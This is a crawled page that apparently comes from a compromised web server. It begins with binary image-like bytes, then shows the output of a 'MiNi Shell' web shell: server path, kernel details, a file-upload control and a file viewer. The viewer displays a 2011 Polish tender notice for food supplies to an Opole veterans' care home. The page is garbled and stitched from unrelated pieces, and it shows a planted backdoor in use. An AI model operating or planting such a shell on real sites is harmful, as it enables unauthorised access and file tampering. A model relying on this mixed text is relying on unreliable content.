JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110118/7876-N-2011.html

<p class="kh_header"><b>Opole: Sukcesywna dostawa  artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole.</b><br>
<b>Numer ogłoszenia: 7876 - 2011; data zamieszczenia: 18.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu , ul. Chmielowicka 6, 45-738 Opole, woj. opolskie, tel. 0-77 4743697, 457 54 95, faks 0-77 4743697, 457 54 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa  artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych różnych o Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wyszczególnionym  w niniejszej specyfikacji istotnych warunków zamówienia w pkt. 2 od poz 1 do poz. 110 
tj. 
poz.1	Andrut - wafle bez cukru 0,08 kg ciastka	ilość   szt 200
poz. 2	Barszcz czerwony  instant - w opakowaniu szklanym (słoiczek)   ilość   szt 10
poz. 3	Biszkopty z galaretka owocową w polewie 135g typu Andante    ilość  szt 138
poz. 4	Biszkopty z galaretką w czekoladzie 136g różne smaki   ilość   szt 70
poz.5	Budyń bez cukru różne smaki 1 kg	  ilość 	szt  35
poz.6	bułka tarta 0,45 kg klasa 	ilość   szt  390
poz.7	Chrupki orzechowe80g	ilość szt	 138
poz.8	Chrzan tarty konserwowy 0,18 kg	 ilość szt	  280
poz.9	Ciastka kruche z cukrem lub marmoladą 150-200g	 ilość  szt. 80
poz.10	Ciastka markizy 150g różne smaki	 ilość 	szt. 80
poz.11	Ciastka markizy 95g czekoladowe	 ilość 	szt. 138
poz. 12	Ciastka pierniki w lukrze typu duet 190g	 ilość  	szt. 138
poz. 13	Ciastka pierniki w polewie czekoladowej smakołyk 175g   ilość szt. 138
poz.14	Ciasto piaskowe 500g o przedłużonej gwarancji - różne smaki	 ilość  szt. 65
poz. 15	Ciastka wafelki różne smaki 450g	 ilość   	szt. 30
poz. 16	Ciastka wafle mini 20g	ilość  szt. 160
poz. 17	Ciastka typu szampanki tradycyjne105g	ilość szt. 138
poz. 18	Cukier biały 1,00 kg ilość 	szt. 2550
poz. 19	Cukier puder 0,50 kg ilość szt	10
poz. 20	Cukier waniliowy 0,032 kg  ilość 	szt. 450
poz. 21	Cukierki Landrynusy 90g ilość szt. 138
poz. 22	Cukierki czekoladowe miękkie o różnych smakach	 ilość kg .17,5
poz. 23	Cynamon mielony 0,02 kg ilość szt. 80
poz. 24	Czekolada mleczna 100g	 ilość 	szt. 450
poz. 25	Czekoladki Mikołajki 16g ilość szt. 150
poz. 26	Czekolada deserowa bez cukru light 0,08 kg( mleczna deserowa) ilość  szt. 300
poz. 27	Czosnek granulowany 0,02 kg ilość szt. 250
poz.28	Dżem mały różne smaki- 195 g bez cukru słodzony asparanem  ilość 	szt. 1500
poz. 29	Dżem mały z.c różne smaki nisko słodzony - 0,025 kg ilość 	szt. 4000
poz.30	Dżem z cukrem 280g niskosłodzony   ilość 	szt . 1200
poz.31	Fasola Jaś  - duży, suchy opakowanie foliowe 0,50 kg ilość  szt. 350
poz.32	Gałka muszkatołowa 0,015 kg (cała - mielona)  ilość 	szt. 60
poz.33	Groch żółty suchy łuskany połówki opakowanie foliowe 0,50 kg ilość 	szt. 200
poz.34	Groszek konserwowy 0,40 kg 	ilość     	szt. 120
poz.35	Grzyby suszone (podgrzybek)  0,02 kg	ilość  szt	. 20
poz.36	Herbata granulowana czarna  0,10 kg 	ilość  szt. 1120
poz. 37	Herbata ekspresowa czarna  20szt		ilość  szt	 20
poz. 38	Herbata owocowa 20szt	 ilość  szt. 138
poz. 39	Herbata rozpuszczalna smakowa - napój 0,10 kg ilość szt	80
poz.40	Kakao naturalne 0,20 kg	  ilość 	szt. 24
poz. 41	Kasza jęczmienna 1,00 kg	 ilość 	szt. 370
poz. 42	Kasza kukurydziana 0,40 kg ilość 	szt. 310
poz. 43	Kasza gryczana1kg	ilość  szt. 150
poz. 44	Kutia0,5kg  (kasza)	ilość szt	 15
poz. 45	Kasza manna 0,50 kg	ilość szt	 800
poz. 46	Kawa naturalna mielona 500g ekstra ilość 	szt. 12
poz.47	Kawa rozpuszczalna naturalna - 0,20 kg 	ilość  szt. 20
poz.48	kawa zbożowa 0,50 kg	ilość szt	365
poz.49	ketchup łagodny 0,50 kg- (37 procent koncentratu)  ilość 	szt  380
poz.50	Kleik ryżowy błyskawiczny- 0,20 kg      ilość szt. 150
poz.51	Kminek ,cały 0,015 kg	ilość szt .60
poz.52	Koncentrat barszczu czerwonego w płynie 0,300 l min 25 procent	 ilość  szt. 200
poz.53	Koncentrat pomidorowy 30 procent 0,9 l  ilość 	szt. 280
poz.54	Konserwa rybna makrela w oleju 170 g 	  ilość 	szt 230
poz. 55	Konserwa rybna makrela w pomidorach 170 g	ilość szt	. 230
poz.56	Koper suszony 0,01kg	 ilość  szt  150
poz. 57	Kukurydza konserwowa 0,40 kg	ilość 	szt. 110
poz. 58	Kwasek cytrynowy 0,02 kg	ilość 	szt. 220
poz. 59	Liście laurowe 0,012 kg		ilość  szt. 150
poz.60	Majeranek 0,02		ilość . Szt 300
poz. 61	Majonez dekoracyjny 0,70 l - (zawartość olej rzepakowy, żółtka jaj 6 procent , musztarda, ocet, i przyprawy)		 ilość  szt. 160
poz. 62	Makaron domowy 5 jajeczny nitka- cięta drobno do rosołu  250g 	ilość szt	 780
poz. 63	Makaron z mąki durum - 0,50 kg(świderek, drobne muszelka, kolanko)      ilość szt. 1000
poz. 64	Makaron zacierkowy 5 jajeczny 0,250kg lub literki 0,25kg, łazanki	ilość szt	. 1200
poz. 65	Marmolada wieloowocowa twarda 1 kg	ilość szt	 30
poz. 66	Marynata ziołowa  do mięsa i drobiu  0,02 kg ilość 	szt. 180
poz. 67	Masa makowa puszka 1 kg	ilość szt. 10
poz. 68	Mąka pszenna tortowa typ 450 1,00 kg	ilość  szt	 930
poz.69	Mąka ziemniaczana  1,00 kg   ilość 	szt  220
poz. 70	Migdały 0,08 kg lub 0,10kg    ilość 	szt 12
poz. 71	Miód  naturalny 0,025 kg	      ilość 	szt. 4500
poz. 72	Miód 1300 g-słoik	     ilość           szt	. 2
poz. 73	Musztarda - 0,90 l słoik	  ilość 	szt 220
poz.74	Ocet spirytusowy 0,50 l butelka   ilość szt. 	180
poz.75	Olej rzepakowy typu  Kujawski z pierwszego  tłoczenia rafinowany rzepakowy100 procent -  1,00 l lub równoważny 	100 procent olej rzepakowy rafinowany z pierwszego tłoczenia.	ilość szt	 630
poz. 76	Orzech włoski 100 g	ilość szt. 20
poz.77	Paluszki solone 100g	ilość  szt. 50
poz.78	Papryka mielona ostra 0,02 kg	ilość  szt. 80
poz.79	Papryka mielona słodka 0,02 kg	ilość  	szt. 385
poz.80.	pasztet drobiowy 0,110kg - foremka  ilość 	szt. 550
poz.81	Pieprz czarny mielony 0,02kg	ilość  	szt 500
poz.82	Pieprz ziołowy .0,02 kg	    ilość 	szt 220
poz.83	Płatki owsiane 0,50 kg ekstra   ilość szt . 280
poz.84	Proszek do pieczenia 0,03 kg	ilość  szt. 40
poz.85	Przyprawa sucha do mięsa i drobiu 0,075 kg typu -Delikat	ilość szt	300
poz.86	Przyprawa w płynie  do potraw-  0,90 l	 ilość  szt. 200
poz.87	Przyprawa warzywna do zup sucha 200g typu  wegeta  ilość 	szt 360
poz.88	Rodzynki  sułtańskie 0,10 kg	 ilość   szt. 100
poz.89	Ryż długo ziarnisty biały   1,00 kg	 ilość 	szt. 590
poz.90	Słodzik 1200 tabletek	  ilość 	szt. 40
poz.91	Sok z c malinowy 0,420 l lub 0,50l	  ilość 	szt 430
poz. 92	Sok pomarańczowy -1l (100 procent )	 ilość 	szt   30
poz.93	Sok jabłkowy-1l (100 procent )		 ilość  szt. 30
poz.94	Sos chrzanowy 0,25 kg słoik	 ilość szt 450
poz.95	Sos czosnkowy 0,25 kg słoik	ilość  szt	 210
poz.96	Sos do pieczeni  ciemny 0,03 kg 	ilość  szt	 250
poz.97	Sos tatarski 0,25 kg słoik		ilość  szt	 100
poz.98	Sól 1kuchenna jodowana kg	ilość szt	 540
poz.99	Suchary bez cukru 0,280 kg	ilość  szt	. 220
poz.100	Suszona gruszka 	  ilość 	kg  2,00
poz.101	Suszone  jabłko	  ilość  	kg. 3,00
poz. 102	Szczaw konserwowy 0,30 kg słoik	 ilość szt	. 150
poz.103	Szyneczka delikatesowa wieprzowa 0,110 kg - foremka ilość 	szt  1700
poz.104	Śmietanka w proszku 200g	ilość  szt  20,00
poz.105	Śliwki suszone bez pestki kalifornijskie ilość 	kg. 2,00
poz.106	woda mineralna gazowana 1,5 l	ilość  szt  2094
poz.107	woda mineralna niegazowana 1,5 l  ilość  szt. 2834
poz.108	Ziele angielskie 0,015 kg		ilość  szt	120
poz.109	Żelatyna spożywcza - 0,05 kg	ilość  szt	 180
poz.110	Żurek   350 g		ilość szt	 300

Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wskazanym w opisie przedmiotu zamówienia, stanowiącym załączniki do  specyfikacji istotnych warunków zamówienia. 
Przedmiot zamówienia będzie zamawiany partiami, które w treści umowy określane są jako jednorazowe zamówienie, w zależności od aktualnych potrzeb zamawiającego.
Wielkość jednorazowego zamówienia zostanie każdorazowo uzgodniona telefoniczne lub poprzez pisemne zgłoszenie w terminie do 2 dni przed odbiorem licząc od chwili zgłoszenia faksem  od zamawiającego lub według ustalonego harmonogramu, a w sytuacjach szczególnych, na żądanie zamawiającego, także poza tymi dniami.
Odbiór towaru w magazynie zamawiającego- od poniedziałku do piątku w godz. 7:30 - 14:30.

Dostawa przedmiotu zamówienia dokonywana będzie sukcesywnie partiami  średnio raz w tygodniu, w dniu roboczym. Wykonawca zamówiony towar będzie dostarczał do siedziby Zamawiającego własnym transportem zgodnie z wymogami określonymi w Ustawie z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225) wraz z odpowiednimi aktami wykonawczymi. 
Termin przydatności do spożycia, od daty dostawy do Domu Pomocy Społecznej dla Kombatantów w Opolu będzie wynosił minimum dwie trzecie  gwarantowanego przez producenta terminu ważności.

Zamawiający wymaga aby wszystkie dostarczane artykuły spożywcze  posiadały nienaruszone fabryczne jednostkowe opakowanie, oraz  odpowiednie atesty, HDI (handlowe dokumenty identyfikacyjne). 

W przypadku niezgodności dostawy z zamówieniem, zamawiający ma prawo zgłoszenia
reklamacji telefonicznie, a wykonawca zobowiązany jest do natychmiastowej jej wymiany na towar o cechach organoleptycznych poszczególnych asortymentów  zgodnie z ustawą z 25 sierpnia 2006 r o bezpieczeństwie żywności i żywienia.
Przez cechy organoleptyczne przedmiotu zamówienia rozumie się zespół cech obejmujących smak, zapach, wygląd, w tym barwę i konsystencję środków spożywczych, które można wyodrębnić i ocenić za pomocą zmysłów człowieka.												
Zamawiający zastrzega, że wielkość przedmiotu zamówienia oraz wartość umowy może ulec zmniejszeniu, stosownie do faktycznych wielkości dostaw, przy zachowaniu cen podanych w ofercie  bez prawa roszczeń z tego tytułu przez Wykonawcę. 
Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. Wykonawca będzie realizował dostawy (zamówienie) po  stałych cenach jednostkowych zawartych w ofercie. Zamawiający  dopuszcza w sytuacji zmiany wielkości opakowania przez producenta  możliwość przeliczenia ceny jednostkowej   na jednostkę  miary..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.83.00.00-5, 15.87.00.00-7, 15.85.00.00-1, 15.98.10.00-8, 15.32.10.00-7, 15.84.20.00-2, 15.86.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków określonych w art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego przez Wykonawcę  wykazu   	wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych 	dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia 	w okresie ostatnich 	trzech lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia działalności jest  krótszy - w tym okresie, minimum jednej  dostawy ( dostawa realizowana na podstawie jednej 	umowy) odpowiadających swoim rodzajem 	dostawom stanowiącym przedmiot zamówienia, tj. 	dostawa artykułów spożywczych 	różnych   na  kwotę co najmniej 80 000 zł brutto z 	podaniem 	ich wartości, 	przedmiotu, 	dat wykonania i odbiorców, oraz załączeniem 	dokumentu 	potwierdzającego, że dostawy 	zostały wykonane należycie lub są 	wykonywane 	należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu 	warunków określonych w art.22 ust.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu 	warunków określonych w art.22 ust.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu 	warunków określonych w art.22 ust.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty wypełniony i podpisany przez wykonawcę.
.2.Formularz  rzeczowo cenowy wypełniony i podpisany przez wykonawcę.
3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych ( upoważnienie - pełnomocnictwo).
.4. Oświadczenie dotyczące udziału podwykonawców w wykonaniu zamówienia

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub poza pełnomocnictwem, w formie kserokopii potwierdzonych za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do podpisania oferty z dopiskiem  za zgodność z oryginałem - na każdej stronie zawierającej tekst.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień z art. 144 ust.1 Ustawy Prawo zamówień Publicznych. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić  od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. Dopuszcza się zastosowanie innej stawki i wysokości należnego podatku VAT w przypadku zmiany obowiązujących w tym zakresie przepisów.
Poza przypadkiem o którym mowa wyżej stronom przysługuje prawo odstąpienia od umowy w następujących sytuacjach: 
1.Zamawiającemu  przysługuje prawo odstąpienia od umowy, gdy
		a)  zostanie ogłoszona upadłość Wykonawcy, zostanie wszczęta procedura 			likwidacji Wykonawcy lub Wykonawca zakończy prowadzenie działalności 
		b) w przypadku wszczęcia  postępowania egzekucyjnego, skierowanego do 			majątku Wykonawcy,
		c) Wykonawca nie rozpoczął realizacji przedmiotu umowy bez uzasadnionych 			przyczyn, oraz  nie kontynuuje jej mimo pisemnego wezwania Zamawiającego.
2.Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli:
           		  a) Zamawiający nie wywiązuje się z obowiązku zapłaty faktur w terminie 4 			tygodni od dnia, w 	którym upłynął termin zapłaty określony w niniejszej 			umowie,
		b) Zamawiający  nie przystąpi do odbioru  lub odmawia  bez uzasadnienia 			przyczyny odebrania 	dostarczonego przedmiotu umowy
			c) Zamawiający  zawiadomi Wykonawcę, iż wobec zaistnienia uprzednio 			nieprzewidzianych 	okoliczności nie będzie mógł spełnić swoich zobowiązań 			wobec Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu  ul. Chmielowicka 6,  sekretariat parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2011 godzina 11:30, miejsce: Dom Pomocy Społecznej dla Kombatantów w Opolu  ul. Chmielowicka 6,  sekretariat parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com